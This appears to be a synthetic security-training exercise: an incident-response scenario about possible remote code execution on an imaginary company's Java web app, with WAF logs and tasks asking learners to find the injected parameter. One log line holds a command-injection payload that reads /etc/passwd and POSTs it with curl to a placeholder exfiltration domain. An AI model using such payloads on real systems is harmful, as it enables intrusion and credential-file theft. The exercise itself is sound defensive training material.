Scenario
Company: Asteria Cards Ltd (imaginary)
Alert: WAF anomaly + outbound proxy suggest possible RCE on Internet‑facing Java web app, followed by /etc/passwd access and HTTPS exfil.
Goals: identify vector, reconstruct process chain, confirm access & exfil, map ATT&CK techniques.
Environment (synthetic)
- Attacker:
198.51.100.88 - VIP (public):
192.0.2.30 - Reverse proxy:
192.0.2.31 - App host:
10.24.6.31(app-ws-31.corp.example) - Resolver:
192.0.2.53 - Outbound proxy:
192.0.2.50 - Exfil domain:
store.nimbus-cdn.example→203.0.113.44
Timer
Elapsed: 00:00Evidence Tabs
2025-11-19T21:45:12Z 192.0.2.30 WAF NOTICE rule=RCE_CommandInjection phase=2 action=ALLOW(mode=learning)
client=198.51.100.88 req="GET /api/export?fmt=csv;cat%20/etc/passwd%20>%20/tmp/.s;curl%20-sS%20-X%20POST%20https://store.nimbus-cdn.example/u%20--data-binary%20@/tmp/.s HTTP/1.1"
ua="Mozilla/5.0 Asteria/2.4" id=910021 tags=[attack,rce,cmd]
2025-11-19T21:45:31Z 192.0.2.30 WAF ALERT rule=RCE_CommandInjection phase=2 action=BLOCK
client=198.51.100.88 req="GET /api/export?fmt=tsv;id;uname%20-a" ua="curl/7.85.0" id=910021
Tasks
Task 1 — Pinpoint the RCE vector
Which endpoint and parameter were abused for OS command injection?
Task 2 — Select all suspicious log lines
Choose every line that directly evidences the RCE chain (read + exfil).